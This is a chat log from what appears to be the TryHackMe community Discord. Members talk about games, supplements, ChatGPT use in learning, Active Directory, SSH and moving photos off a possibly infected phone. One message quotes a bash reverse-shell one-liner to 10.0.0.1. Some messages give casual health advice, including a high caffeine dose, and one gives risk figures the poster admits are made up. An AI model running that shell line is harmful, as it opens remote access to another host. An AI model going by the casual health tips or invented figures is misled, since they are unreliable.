#general

It's from Overpass 2.

Please use #room-help for Tryhackme related questions.

As a line to grind tree wise, a premium, or IRL?

okay

First 2. Got a 500% research

Base it on the vehicles around them. Both perform well. Abrams is a bit of a brawler, Leopard can have legendary turret resistance though hull down but isn't a brawler.

Both can still be one shot by one fast boi on the side

If you want to compliment your tank with something like the A-10 in CAS and come in for that brrr boi feeling

THen Abrams

https://tenor.com/view/a10warthog-plane-brr-gif-27117334

Germany is more about dropping ordinance and getting out.

Between the twp 10.3 prems of the M1 KVT or the Leo 123, I love my leo more

But grinding for rank 5 to get Maus when that event comes alive again

Bur am American 🤔

@hasty sand whats up dude

Well if it makes you feel any better half of the American mains aren't the brightest.

im so good and happy

They had the worst win rate at top tier

@boreal scarab

cool

Sup Cookie

i sit in cuba what about you?

I sit in America. Cuba would be a blast to visit and have some coffee

And a proper cigar

@bitter quiver do you wil write with me privatly?

https://tenor.com/view/wyaking-gif-9712475764034023502

Not at the moment no lol, if you linger around and become a functioning member of the community maybe lol

Oh jesus.... German it is then

Aye. Now it's a different story in Air Real Battles where America is undisputed thanks to teh F-16C. But Ground is brutal

Gave +1 Rep to @boreal scarab (current: #31 - 248)

Huh

I'm more ground

Ditto, I only do top tier air to grind air up so I have CAS vehicles lol

Ez rep

it's kinda hard to learn new skill =/

Chug 400mg caffeine and 1gram of Lions Mane and go into an ADHD fixation for 2 days

https://tenor.com/view/caffeine-fry-coffee-100-futurama-gif-18341395

when i read that lions mane fix things i cringe

im in cuba

mashroom

mushroom

or whatever eng word is

yes

It has a great effect on me. I'm scared to try nootropics again now that I have other meds in my system, but lions mane gives me insane focus and clarity

I also always poop like 30 minutes after my morning coffee

If I gave it up...not sure how I poop

i eat lions mane for year and years. taking that lions mane fix adhd is placebo effect

It's not placebo, and it won't help ADHD>..

I use it to enhance my ADHD

lol

sup sup

Caffeine is also problematic for ADHD and should be avoided

But I simply embrace it to learn a new skin in afew days

i eat lions and cordyceps for years

actually that's wrong

zombies

"Lion's mane is not recommended for ADHD because there aren't any clinical trials that prove it's effective."

☝️ I was not that off

music from last of us

oh, thought it was a response to caffeine as your other message included that word

Ah

mushrooms are rich with things. but nothing special. they can help in things or two... ADHD is brain thing and require medical attention, and that's why ppl can say that lions mane and so can help in adhd. cos it can't

Damnit you edited

but caffeine is helpful to some people with adhd, including me, it makes me more focused and not full adhd as I normally am

I was about to joke about 10th cup

I have ADHD and far more than medical intervention the main thing that granted me control was....self control. Meditation, and mastering my own mind. Now I have enough control over it to manipulate it for anything important without the side effects of medication.

It does help with focus, but you also enhance your symptoms as it wears off

not really

Can you cite your reference?

sorry couldn't resist 😔

I would be interested in reading more

after 10th cup...

Let me look for it. IT was in a journal I was reading not too long ago

depends on the person

SUBL

you are not wrong. things can help for sure. the issue comes that lions mane will solve all the issue they have with ADHD, so marketing does that and sells things. until one day some of ADHD ppl gets cared and use something that will end up bad as it can. and then shit will get serious... as a lot's of things in theese days

Supplement industry has been lying to folks since the 1910s

cite that?

Snake oil salesmen = supplements

No citating needed

Also I've been a supplement representative for a company on one of the biggest forums back in my hayday

lie or not... if you are not sure what you thing to take you talk to doctor. special if you have some mental disorder or any brain/body issues

100%

Always talk with the doc

Mine knows what supplements I take, it's on file

Never know when that may come in handy in an emergency as well

Even supplements can have series interactions with medications a paramedic or the ER may use

i had tons of "supplements" in my lab to test what it is... and they are not as they need to be...

Truth. Most supplement companeis use a lot of filler

IT has what they say in it, but the amount is so tiny it can't fill a capsule

SO they add in filler

sadly im NDA bounded of not allow to say... thing i can is that they lie for sure

Granted some things you dojn't need a whole lot of

You can still to this day go online and buy pro-hormones

Legally

And get buff as hell fast

and die

ANd mess up your endocrine system for life as well

Nah

thoes things are given to ppl under extra medical atention... ppl take things to easy...

as you say... you fuck you self for life

Studied anabolic pharmacology for about half a decade and while some things are terrifying, especially methylated compounds like the old M1T that could obliterate your liver in a month, most pro-hormones are lighter and only a tiny% as effective. THey won't kill you. But they will cause lifelong issues

Most users will never get their original testosterone levels back after they stop

So they end up on TRT in their 30s

Granted some folks want that

So how would you increase testosterone naturally?

Eat well, sleep well, work out.

Insteof of boosting it lol

SOme arguments exist NOFAP

Staring at attractive lady? Really?

Please can we keep the topic professional and appropriate. This is still a workplace for many people.

Sorry, and I actually meant that medically

same. well as chemist.

That's interesting what you've said but the chat is allergic to health improvement so let's "change" topic

workout.

lol

yes

They aren't allergic to it. I just phrased it in a way that could be less than professional

I disagree.

It's fair to call out

Thanks for sharing your feedback

Gave +1 Rep to @bitter quiver (current: #391 - 12)

seek professional guidance to get the best personal plan

im not in medical field so i can't comment on that. things i can say that ppl take things for granted if they can buy. lucky i can test things if i wish and do that for years now. it's sad that how some things get so easy on market

Personal trainer and if you are ever unsure have your doctor do a hromone levels test

But seriously. Eat, sleep, workout is it. Our bodies are designed to do their jobs

Supplements at best can give you 2-3% change

rly wish there is more education of not to do things

It's not a good thing to do with mods otherwise the thor hammer ban can't wait to be used so that's it

suppl are small amount. they are nice to give small extra food to body. just to keep you self up

But yeah everyone has his own opinions and stuff

Mods here are fair, they won't do thattype of stuff unnecessarily.

professional nutritionist not trainer* a trainer doesn't have the proper knowledge to help you out in that department

As long as we get alors we good

Do you hit the gym?

Nutritionist wise I just followed the eat every veggie and a ton of chicken routing back in my day lol

We can't be that had, you're still here...

i won

Hey @upper bison Can you keep your negative comments to yourself?
If you disagree with how this server is moderated, my DMs are open to any feedback.

But, if you want to make inappropriate comments towards any members of our team, you will be removed from the chat 🙂
I will not tolerate any comments that are making community members uncomfortable, especially anyone in a minority.

Because I didn't choose to engage with no mod that's why

yes, and my mom is a professional nutritionist and personal trainer, same is my step dad

Lucky

That's good

I had to learn everything on my own in the early 2000s

You don't have to engage with us at all....

The wild wild west

At least it paid off

Nice

But I'd maybe read and take notes.

my step dad in the early 2000s was a professional MMA fighter

one of great things is that kind of ppl know what they say

Daaamn that's fire

Even in my prime I wasn't interested in that stuff, the injuries just linger. My own injuries already linger lol

but yeah, I have grown up my whole life knowing and learning about nutrition, how it feels if you're low on something and how to do proper dieting/weight gaining, etc.

@upper bison Can you acknowledge my message please? I am informing you that your behaviour is inappropriate and not tolerated here 🙂

im really bad at pcap analysis. any tips/tricks? i have a pcap file that has the flag and can't bring myself to look through hundreds of lines of traffic. (redirect to appropriate room if needed)

Do you have a TryHackMe account?

They have a few wireshark 101 rooms.

lots of rooms

Yup these rooms are real good.

i never was some hard fitness guy. but have fair amount of conversation with ppl who know what they talk and do. and they for sure can back up some of results that i do on work. that's why i say that ppl need ask doctor at best if wish to take some extra stuff for body

learning wireshark on thm
good times

yeah i have an account. been dreading the wireshark ones but yes yes I'll start there 😮‍💨 preciate it.

Got to start somewhere I'm afraid. 🙂

You can't learn how to sword fight without learning how to hold the sword

Been quite a while. How are you all doing?

Good but your profile pic is making me wanna play Zelda Oracle of Ages

and do not skip while learning and take good notes

https://tenor.com/view/oracleofseasons-zelda-game-gif-13749375

Man good times for real.

I have both carts and the paperback old guidebook

I still have 'em boxed.

Wow thats crazy ngl. I used to play it on my brother's console.

I need to sit down and actually play through Breath of the Wild

Own it but never had time for it yet due to other games

So little time in teh day after work and wife

I'm glad they have the LoZ games on the Switch via GBA and SNES.

Yeah that's a nice touch.

Yup its really good. No other games have that spark that zelda has. But yeah no time to play true

A packet is the encapsulated bit of data that is sent as part of a series from one node to another

I'd look at some networking rooms on THM

Before the hacking stuff

Gave +1 Rep to @bitter quiver (current: #365 - 13)

This is a good THM room on packets and frames.

Have a read on protocols. And osi model. After joining in an soc firm i learned the importance of these fundamentals is a huge W

😬 we don't use ChatGPT to answer questions here

Ironically I was writing out a similar explanation just with more detail

Think of a package you order on Amazon.

Stamp/Delivery Service (Protocol, the type of postal service used to deliver the package, e.g., standard, express, corresponds to the network protocol used: udp/ tcp...)
Recipient's Address (Destination IP Address): The address of the person receiving the package.
Return to sender (Source IP Address): The address of the person sending the package.
Envelope/ Box (the packet itself is like the envelope or box that carries the data)
Package Contents (Payload The actual contents inside the package are like the data being transmitted)

It's not ChatGPT but the model GPT4o, but okay. I don't see a reason to waste time when such explanations can be had in a fraction of the seconds, but so be it.

It's not accurate and if you know the answer you should be able to write it out relatively easily.

hey

That is still ChatGPT 🙂

We're fostering an environment wherein ChatGPT isn't used because most people just blindly copy and paste from it

It's not ChatGPT, no. ChatGPT is what you find on chat.openai.com.

If people start using it to answer questions, less people will actually check the message

Where do you find GPT4o ?

https://platform.openai.com/

I am on chat.openai.com.

Oh, so the same people who run ChatGPT then, thanks 😉

Gave +1 Rep to @wide marten (current: #629 - 6)

And I'm telling you I did not use ChatGPT but the raw model.

It can also be wrong, in so many ways.

And confidently wrong.

You can choose the sources with search engines.

Do you also just choose the one source?

Which can funnily enough, also be wrong.

It first writes from it's database, and then pulls the sources second

Source: I use ChatGPT a lot.

Hey, is there a channel where ei can post about cryptography in general? I want to ask a question and idk if this channel is appropriate

Here is fine.

either here or #infosec-general

Alright, it's a few paragraphs though sorry if I flood the chat 😅

So I got this silly idea today, which turns out (imo) to be pretty cool. In an attempt to save your time: yes I won't roll my own crypto, and I know it's not a "good cipher"
With that out of the way, I was thinking of a transposition cipher where the characters of the plaintext (strictly works for the English alphabet without any numerical characters/symbols, old fashioned huh) are plotted in a 2 dimensional space where their X position is the letters position/index in the English alphabet and their Y position is the letters frequency (stolen from Oxford University 😉).
And now the fun part which I have yet not figured out. My first approach was to somehow rotate the array containing the points which represent the letters by using some kind of smart magic number, that would produce a somehow appropriate result, but I'm not good at math so I put it away (for now). I also had the idea of literally rotating the points in a 2d space by using the
appropriate math formula obviously. The angle could be the number of rotations. After rotating the points there could be some mapping mechanism to translate the coordinates to letters.
I basically don't know where to go from here and need help. I don't want to give up to this idea and I won't. All help is appreciated ❤️

I love to eat me some strawrery.

But if you don't know the answer to something, would you not use a reliable source?

The whole argument of reliability doesn't hold up. If I want to know what something means that implies I don't know myself. Whether GPT misinforms me or some article out there, makes no difference.

i can dox its me no matter and yes your a traitor

Wat?

I highly recommend using GPT (be it through ChatGPT or other means) to learn. If you don't know what something basic like packet means, there's an almost zero chance GPT gets it wrong. Certainly not bigger than Googling it and reading some random blog post that you have equally low chances to know whether it's correct or not.
What you do get is an answer within a second, no clicking arround, no cookie banners or popups, no loading times, no scrolling, no nonsense. Often with examples, tailored to the level you ask for (e.g. ELIF), with the option to ask follow ups. It's a fantastic tool.

Interesting take. I made my on cipher too so i know how you feel. I would suggest you to put the math in action. Start to code it maybe in any language and see the limitations. Most of the limitations could be sorted out with padding i believe just by skimming thru what you said.

In information security, we highly recommend researching.
It is an amazing skill to learn and there are a lot of niche topics that are really hard to get from ChatGPT accurately.

When you start to take short cuts, such as using ChatGPT, it does in fact negatively impact your ability to read an interpret resources. And further, it reduces your own internal knowledge base of accurate resources and go-to websites, i.e. hacktricks.

Difference between ChatGPT and using Google is one of them provides you with one resource whereas the other provides you with a range of resources, and most resources that do exist out there have a following of users verifying it.

This is fine but it is a policy in the Discord server not to answer questions with ChatGPT.
You are welcome to use it yourself to aid your learning if you want.

Also if you don't understand how a line of code works or a certain command, ask GPT4. You're gonna get the same information you'd find clicking around in docs, but faster, with usage examples and added information.

I'm not debating the policy here.

Thing I'm missing is imagination. I've implemented the plaintext mapping to 2d space, no problem. I just don't know what to do from there

Neither am I, I am just making it clear.

Your end goal is yo set up a cipher or manage something like back and forth communication and encryption?

That's just being lazy to learn.

But you cant do goodle dorking on gpt which is almost my primary way to search something up lol

That is very much learning.

It's not, it's gaining surface knowledge, you found out what the code does, now you're not going to read further, are you?

Of course not, and don't pretend you will.

Like if I don't understand how the basic reverse shell
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
works, I can google for an article that explains it, wasting time. Or I ask GPT4 which summarizes all that information out there, breaks it down into individual components and explains each. If that's not learning idk what is...

You must have a slow internet connection if it takes you 5 min(s)

You get quicker and there are places you find with amazing resources that you find by researching.
Just with any skill, practice makes perfect and if you stop doing something, you will naturally get worse at it over time.

Just a cipher.

I have a website that does that better than ChatGPT.

I want to know what a code does, it contains some syntax that I am not aware of. The LLM explains it to me, gives me another example of how to use that. Now I learned. Simple.

For the record, this is inaccurate, it's the first Google result 😁

I now got the idea to somehow merge the X,Y coordinates of the points and that value is then somehow mapped to a character

It's not really a transposition cipher now that I think about it though

So if I take notes here I'll become a hacker

hehe

i could not find the sus emoji

Tells me to go to a link that doesn't work

See, I've been researching stuff online for the last two decades, i don't know how many thousand hours on stackoverflow, reddit, docs. There's no way I'm going to ignore an easier way to access information that works just as well but in 10% of the time.

So you're arguing for no reason at all?

Why would you choose a language model that isn't up-to-date and has no way of knowing what's right or wrong over the official documentation you can find in less than 5 seconds?

@naive violet

You said you researched the topic previously
Just wanted to share with you what I found, I benefited from this

https://stackoverflow.com/questions/67145156/can-we-create-application-which-run-on-android-tv-tablet-and-android-phones

https://stackoverflow.com/questions/66457339/can-i-use-same-package-name-for-android-mobile-and-android-tv-apps-for-play-stor

https://developer.android.com/training/tv/start/start

https://developer.android.com/google/play/publishing/multiple-apks

@bitter quiver so you think Leopard 2 PL is better if I wanna EASILY grind the tree?

Because in 99% of cases, at least for me, the LLM is up-to-date enough to answer my question.

I doubt it's 99%.

I got 2 tanks left of rank 3, then once that's done, going to be researching rank 4

How do you know it's up to date? By checking the official documentation

Wait, you guys play world of tanks?

Unpopular opinion: do your research first and then ask LLM to simplify the parts of your research you didn't understand. This way you can most likely be assured that it's not pulling information out of its robotic ass because you are going to give it the parts you want simplified

Atleast it works on my machine

ask it not to make up facts

I tried looking for my screenshots of ChatGPT being wrong, oh well.

That prompting is top notch

So many folders of screenshots 💀

I'm happy with that risk that once in ten years the tool or programming language I ask about has just been updated, breaking everything the last GPT model was trained on 12 months ago 😉

LLMs are cool and definitely have their uses, but blindly following what it says without doing your own further research isn't a good habit to have, and can even be dangerous in some cases

My point was proving sometimes ChatGPT is wrong, and confidantly wrong.

What do you think gpt is trained on?

Found it.

That's the current model.

Those website you filter through can contain more information than ChatGPT will give you.

To each their own, for me that answer would fully suffice.

https://tenor.com/view/all-of-this-pointing-up-there-see-this-gif-14720503

anyone saying googling yourself is much safer are deluding themselves Complete nonsense. When you have even a basic understanding of what a trustworthy source is, it's pretty easy.

Googling yourself is safer...you can filter out the resources you view...

😅

Then you're doing bad searching.

I feel like this conversation is just going in circles

You can't, because you don't know, otherwise you'd not be looking for the information. You want to learn.

How about we move onto a happier topic, huh?

So high tier ground is a different game than lower tier ground. With darts, thermals, ERA, helicopters.

When you say Leopard 2 PL do you mean the green one at 11.0? Do not get that.

As I have mentioned previously, ChatGPT pulls the resources AFTER you ask it, not before.

Yes, and aight

Love that my little brother is out developing some fun potential dad lore

Yes you can. If I wanted to look for information on python I'd google for it and find the official python documentation

I will not ask to ask if yall promise not to laugh at me for being mathematically stupid in all ways

Put all of this effort into a CTF and see who can do better 😎

I really want to eat an ice cream right now lol.

That's a squad vehicle. You can unlock with gold, but you also get for free just by playing over time.

ANd it has no benefits for lower tier reearch

Love that my little brother is out developing some fun potential dad lore

Do you have alzheimers?

Phone and bad connection

That's like me saying

"All bunny rabbits love cookies" and then Googling whether or not it's true and finding one single resource about a bunny rabbit liking cookies.

Do you have alzheimers?

No I got autism

There's a big brain joke in there somewhere, I'm playing 5d chess

But he called me being like "you have a light running on battery? We out fishing next to you and staying overnight"

wait

Sadge

Jabba, did you forget that you searched that?

Sorry to say, you do have alzheimers.

huh when did I post that screenshot?

You've lost it.

There there

carbon monoxide poisoning

Because it’s pulling the resource after making the statement and it’s search query is bias

You can’t make a statement and then try to find one resource that backs up your statement

You have to ask it to research first

“Do strawberries grow on trees? Please provide a resource for your answer”

This

Confirmation bias, right?

My approach is usually looking for resources that deny my statement.

That’s the word, tank u

I'm confused as to what is going on

https://tenor.com/view/funny-mad-we-are-all-mad-here-gif-22706769

Useless conversation that has been dragged on more than it should have 😆

And 9/10 times it'll just generate a random url that might sound correct based on the next possible word

https://tenor.com/view/ohio-ohio-meme-stan-twitter-meme-chat-gpt-gif-10852993650488188046

How is everyone doing?

Dead

This is hilarious

chatgpt 4 is better, it actually has access to websites

😂

Are you still off caffeine?

I ain't paying for that. I have access to websites myself 😅

Its free if you had an account before the launch

No, I went to pride yesterday and then a metal concert and I was overstimulated for 9 hours and my autism hates it

I have premium, it’s someone to talk to 😔

Does it give you massages

🤣

🤣

Pick a more divisive topic, like election falsification. It will pull sources for both depending on your query

Might take a few tries as it will warn you of inconclusiveness of stuff etc

But it's still dumb enough to let stuff slip

Don't outsource research to llm even if it can google

Exactly. And we usually don't ask gpt about stuff we know about. So be vigilant even when there are sources, is all

It will try to please you

I have arguments with ai all the time. Never pleases me

🤣

4o sounds flirty. Give it a go

You'd be surprised

People seek for reinforcement of their beliefs usually

Not proof that they are wrong

Yup. That's what confirmation bias is

Smartest people on the planet fall for it in research

It's normal

Tbh it's impossible to know everything so good to have something there just in case

so gotta be aware of it

Default chatgpt

Nah, when you do any research. Gotta stop and ask yourself if you are actively trying to confirm your initial idea. Not on purpose, but by accident

Not just that, even when LLM is asked to provide references, it will sometimes make them up. Regardless of the truth of the response, if you cannot verify it, it does not have value.

Especially if one is not a domain expert in the field being asked about

Can't wait until llm is able to host a website to provide you a proof

3 PM, didn't eat lunch or breakfast, and I'm starving, but too close to dinner. Sadge

Early dinner.

Cats gonna eat me

They act ultra hungry

But i fed them 30 min ago

Cat just greedy.

My cat likes to try and con everyone out of food

Sounds like me 🤣

🤣

It's better with sound

Infuriating

@jagged moon

I just ate lunch

Ground beef bowl with a bunch of vegetables

You know what goes great after lunch? Beer.

Nah, the afternoon coffee

Way better than beer

Hi

Swiggity swoogity, that pic is now my proopity.

How about some football between old castle walls? ⚽

Yeah, it's alright. I overcooked the beef and undercooked the peppers this week.

That's Soccer

https://tenor.com/view/150rupiya-dega-gif-23330496

This is Football

You mean rugby

the entire rest of the world disagrees with you

too much foam 😂 but I love paulaner

What dat

You can blame yourselves tbh

Rugby Football, the original football

It's actually American Football, the rules are different. And Rugby players are badass

overcooked beef 😱

congratulations steak

Amen to paulaner, and I like this amount of foam

btd6 goes hard 🔥 🔥

The only reason why the term soccer exists is because of the British

3 or 4 centimetres top

FYI mickey mouse is a rat

Not a mouse?

Mickey Misnomer

nop... a rat...

When I was in school my drama teacher said if she didn't feed her cats her cats would know valuable things off the units

Some cats do that for the lol.

bruddd how are you?

so why is not called mickey rat 😂

idk that

mortimer is a rat

mickey is a mouse

Tired hit can't sleep

But

rugby requires no protective equipment that american "football" requires

hence rugby players are more bad ass

not to mention rugby does not lie about what it is compared to american "football" because you basically never kick the ball in american "football"

it would be like calling handball kick ball because sometimes the players accidentally kick the ball

Depending, you typically kick the ball every 4 plays. You also kick at the start and end of each drive in "American" Football.

compared to football where you kick the ball all the time and the only time the ball is in the hands is if a goaly is holding it or it went out of bounds

Yeah each team has a guy who plays football. That guy is called the kicker. Once he's done, the rest of the guys have to run around trying to bring the ball back to him

Getting back into THM after a while of alert fatigue

Welcome back. Go have a little fun

You forgot the punter

Punter is now sad

Yea, I'm trying to complete some of the stuff I started a while back.

Thanks!

Noted 💪

I feel dirty.

ello ello mac

Raleeeex!!

macalack

(To avoid being strung up, rightfully: This is just to test if Stalker Gamma works better under W10)

@hollow pivot did you participated in Pre CTF of nahamcon? 😄

Bellaaaa!! How ya doin?

feeling dead

Got any more good coffee for me?

you?

Oh shite, why that?

I might

I was outside all day yesterday and was overstimulated for 9+ hours

https://www.deathwishcoffee.com/

https://tenor.com/view/hug-warm-hug-depressed-hug-gif-4585064738068342394

my autism hated it

Black rifle coffee!

Oh god you poor human hug

but it was pride!

and metal concert

Ah, that would certainly make it worthwhile.

What'd ya listen to?

ye

some danish bands

I think

my head was dead when we did

so I don't remember anything

so you should stop using windows then 😉 😂 😛

But I want to play Stalker! And under Proton it doesn't seem to get anything above 30FPS, despite me having a Quadro A1k RTX.

Yes, I know the x-ray engine is held together by duct tape, vodka and slavjank, but stull. (Not to say that the x64 version of that thing is any better)

I got work tomorrow

doing another 3-4 hours of cable management

why is both defcon discord and tryhackme discord talking about cable management???

cause it's amazing

oopsie

smh

OOOPPSIEEE 💅 💅 💅 💅

Me when I information disclosure

me when I want to just do fun open source programming, and find a big vulnerability 💅

So let me paraphrase what I understood of AD:

• Domain - the collection of people and machines in a business
• Domain Controller - The device that allows the management of the domain and runs some services
• OU - A hierarchical grouping of users and devices
• Global catalogue - the place we search for all objects and services
• Schema - Components that defines what device types we can manage and their attributes
  Is my understanding correct?

I would greatly appreciate if someone gives me a heads up, corrects me/add something

Except for the last point I'd say that's an okay first approximation.

Schema is much more than that. Most importantly you define a schema for users. You might want that in addition to all the default values you also store the tryhackme.com accounts of users. So you'd add such an attribute to the schema.

Yes, I did not manage to understand what exactly schema is

From the microsoft docs: The Microsoft Active Directory schema contains formal definitions of every object class that can be created in an Active Directory forest.

One such object class would be Users, another one Computers. But there are many, many more.

https://learn.microsoft.com/en-us/windows/win32/adschema/classes-all

So the schema is basically not some code or component, it is just a guide or the logic that explains what is what in AD?

It's a template of sorts. Or if you know SQL, imagine the columns of a table.

Aha

It defines which objects (can) exist and which properties these objects (can) have.

Doesn't AD have predefined ones that are default and cannot be changed?

But I think I understand the use of the schema

Like for the User class these are some of the default attributes (another word for property): account-expires, country-name, department, display-name, employee-id, last-logon.

You could add an attribute favorite food to the schema and then you can store the favorite food of every User in your Active Directory Domain

By the way, they advised me to disable SSH password login into my devices

And instead using keys

They are correct, but who are they?

What is the best way to secure my devices against unwanted connection attempts, if I plan to enable remote ssh

Some of my friends

I need some help. I need a safe way to transfer important photos off of a phone that may have malware on it. The phone is a samsung S20+. My wife clicked a link in a scam email by mistake. Not something she would normally but it happens. The wifi was turned off and the phone was put on airplane mode. We got a new phone because it was in the works already and we didn't want to wipe the old phone and loose pictures and text messages from her dad that past last year. How can I safely get the photos off the phone without also transferring any possible malware?

Again, I love hearing multiple opinions

How do you know you have malware/virus?

I have also accidentally clicked on advertisements and etc. on websites

Install malwarebytes onto your laptop.
Plug the phone in, transfer all the photos, scan all the photos with Malwarebytes, upload to GDrive

Also you can go to https://www.virustotal.com/gui/home/upload, to see if any website or file is infected with something

Chances of a photo containing executable malware are slim to none...

Maybe it's not easy to run a virus using steganography? Or I am mistaken

Or steg is only used for hiding data in media

And by slim I literally just mean if the software you use to view the image has a vulnerability in it

Does exif delete malicious code or only metadata?

Correct.
You can hide a virus in an image. Hell, I can turn a virus into an image, but it ain't going to run without a bunch of pre-processing.

Your friends are right. Public key authentication is the way to go.

And disabling passwords right?

Huh?

Only with ID + Passphrase?

Exif tool

It is used for deletion of metadata

exif is metadata lmao

yeah, was just wondering, ik it sounds stupid

Why not skip the middle man and install Malware bytes on the phone?

Im not an expert

Oh, exiftool. Yeah, that just messes with the exifdata. Doesn't do anything to the image data.

I see

Btw hi Muiri

And hi to Jabba too

Also good night, have to go to bed as I have 6 hours to sleep until work

And thank you for everything to everyone

Appreciate the community work and guidance

Connecting it to internet might allow the malware to communicate with it's server if it has one

This is where my lack of knowledge in this area starts to show. am I risking the laptop by trasfering the photos onto it? Or am I safe as long as I don't go opening files? Am I just really over thinking all of this? Just want to make sure if she did have something malicious on the last phone it doesn't end up on the new phone. I know just enough to to start to scare myself.

Best to transfer anything important first and then connect it to the internet and scan it

Unless there's any .png.exe files, you should be fine

Was that a joke?

Correct

Phew

^^ heck even a simple .txt file with text contents can be malicious if the software using it is vulnerable

Chances of downloading something which actually compromises the device are reasonably slim. Chances of it being hidden in an image are even more slim. Chances of it working on both Android (?) and Windows (?) are minute. Chances of it working on both and being able to execute itself on the PC are basically zero.

You should be fine plugging the phone in, transferring the photos, then leaving it there.

Bunch of classic exploits in old software by providing a malicious config file 🤷‍♂️

The goal is to be able to get the photos onto her new android phone safely

Hehe yep, can't wait to disclose this bug because it's literally just like that

Probably safest to transfer them through another medium first, just to be safe.
Usually I would say just clone the old phone to the new one, but that's not advisable if you think it's got something malicious running on it

imagemagik

Which android versions?

https://blog.cloudflare.com/uncovering-the-hidden-webp-vulnerability-cve-2023-4863

Webp moment

My first recommendation, use google photos or something for backup. That's what it's for, to not haul thousands of pics around

Google photos new AI feature looks interesting

My second one, is to skip windows as an intermediary completely

670 results of imagemagick
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=imagemagick

Plenty of file managers like FX allow phone to phone connection. Via cable or wifi or bluetooth and do transfers. There is also quickshare in latest androids

Chance of having malicious picture if you transfer only DCIM and Pictures is ultra slim unless you are super targeted

Just make sure it's one way only, if you suspect the old phone of acting funky

The old phone is android version 13 the new phone is android version 14

Google photos route allows you to skip all risks entirely

May need 2 bucks though

Deepnds on size

you can also just do nearby share or bluetooth

sorry I'm not familiar with that could you please explain what the google photos route is.

Google has an app. Photos

or just:
https://www.android.com/transfer-data-android-to-android/

It has a backup there. Uploads every photo to cloud

Like icloud

Uses google account storage. So it's limited. 2 bucks gets you 100 gigs

That's how i migrate pics to new phone these days. Instead of transferring them, i turn backup on before taking the phone to the factory reset

When you use the photos app on new device, all your library will be there

https://play.google.com/store/apps/details?id=com.google.android.apps.photos

Bad part, google has all your pictures XD

ah. Does google backup check in anyway if there is anything malicious or is this going with it's unlikely clicking a malicious link would would affect the photos? I am learning a lot fast and just want to keep it all straight.

Good part, your storage is free, and you don't plug suspect phone anywhere

there's wayyyy to low possibility for you to get your phone hacked

I like that good part.

It's highly unlikely you can host a malicious image in google cloud

The good days when you had unlimited Google photo storage ☹️

If you get hacked this way collect your 10k bounty from google

like 0.4% chance for you as a normal person to get your phone hacked, especially via pictures

Ikr

numbers I made up, but you get the gist

And here I was super impressed you knew the stats for that

well, I ain't allowed to say what I know 😄

So yeah, if you in paranoia modez I'd upload pics to cloud via google photos

And it's a nice service too

(so far)

My only big question is there a risk letting the pnhone connect to my home network in order to upload the pictures to google?

^^

no

If it's infected you may be part of the botnet for a while

But probably ok. Make a guest network for a day if you worried

Most modern routers support a guest wifi without access to LAN

My favourite feature of Google photos has to be the map

Thats a good idea.

Only a small portion of photos taken to our gsuite cloud have exif, but still really nice to see

Watch your google account activity too. In case it does something weird. But it should be ok

I guess the only flaw would be if on the old phone she has to input log in information for her google account if its not signed in already

lmao

I got 5$ on nothing of that actually works

I like that it knows my cats by their faces. And makes collages and memories with them for me

I doubt it hijacked intents. And malicious app will have to authorize with google. Which will require you to click some buttons to allow things

Awhhh that's cute, I presume you assigned names to the faces?

Unless your phone is rooted and you gave root perms to the malicious app

:hammer: cyberghost081#0 has been banned.

It's the wifes phone so who knows haha

Hence, watch activity

cute cats

Can change pw after

And 2fa for overkill

good point

Anything that had access will lose it

too paranoid imo

self-host immich

Well ye. We in paranoia mode

for images

if we go paranoia mode, then all old data is gone

at least mine

Admiring the cat photos

@tender pulsar in general you should be fine!

But if you wanna be safe safe, just in case. You know

I wasn't until I saw in the news that a bunch of BMO customers had lost a bunch of money from bank accounts and she does our banking on her phone. Then I got a little more paranoid than usual.

Do all those things

My god what a cutie

Hi guys iam in vulnversity room

I wanna know how to see how many ports are open. On this target

#room-help would be a nice place to ask

all deceptive

literally

if (sleeping | eating) {
calm
} else {
attack
}

that's a magic elixir that makes work tolerable 😉 😂 😛

What's that laptop?

hp something

by the design looks

or old dell

I actually have no clue, the photo was taken a while ago

But I think Bella is right with the HP or dell

I need a new laptop

Will probably buy out some lenovo from the company

Used business laptops are a steal

I just got a lenovo gen 1 t14 a few months ago. I like it. It's a big improvement over the t430 I had before.

I think there are bunch of x1 carbons in the storage

Those look like they would be nice.

Thin and good

All the lenovos I have used have been very tough and well buld machines

I got a t14s and thinkpad pro

The Latitudes are great

@chilly veldt u dutch, right?

ouch

danish

Dammit

Potato potato!

....

I would rather be called german

sounds like fighting words haha

or even norwegian

Guys how many time takes to deploy a machine ???

Who is dutch besides dolphin

Guys how many time takes to deploy a machine ???

Dolphin don't count

3-5 min

and if I take the big stretch.... swe 🤢 dish

aint shadow swedish

Iam taking like more than 30 minutes

yes

maybe #room-help will be better

I am out everyone have a good day/night

Have fun with the phones. Don't stress much

Thanks. We have family in from out of town so I will deal with it in a few days most likely.

Gave +1 Rep to @jagged moon (current: #12 - 566)

When you are going to sleep and check up on your alarm phone and see there's 11 alarms laying for you when your shift starts tomorrow morning 🙃

So you understand your mistake, right?

My mistake is not sleeping earlier

No o

It's checking the phone!

and timey whimey meepy moopy sleepy sloopy to the beepity boopity for shadow whadow to go for sleep sloops to the beep boops while they meep moops

I want to learn the C++ language. I have basics in the programming language. Should I learn programming from forums and read the codes written in forums and learn from them? Or that method is bad

The good method is whatever works best for you

If you have done this before on forums, sure

Otherwise, stick to more conventional ways

Or just start writing and learn as you go

I mean what forums

i dont know if you know this website

but

I don’t

its like stack overflow

but i mean i want to learn from website like stack overflow

Problem with that is most of the people who use forums ask questions about there code.

You could look at there code but it’s not exactly teaching you how to do it

IMO the best way to learn to code, is to start coding. Pick a simple project that YOU want to do and start writing code.

Reading code is a good way to encounter new ways of problem solving, but it doesn't actually make you better at solving problems.

That community looks devoted to roblox etc hacking. We don't condone that here so i removed your message. Please read the #rules when you have a moment

Oh

Hm

Anyways

https://nedbatchelder.com/text/kindling.html is really good!

roblox 💀

But programming is part of hacking. I want to learn programming, so I am asking

Hacking can be a lot of things. Ethical and unethical

https://www.codecademy.com/learn/learn-c-plus-plus

Gotta create a account tho

Hi

greetings

ello

llo

lo

o

https://tenor.com/view/boing-gif-6037249

https://tenor.com/view/arkansas-nichijou-deer-gif-18971935

toink, toink, toink

Figured out the wireshark thing just so ya know lol spent way too long trying things turns out just ftp-data > extract object > open docx in libre. One useless rabbit hole that was cool is docx are zip archives?!

Google chrome is about to do another stupid thing

Manifest v3

Bitch move chrome

I switch to Firefox because of it

I don’t like google either

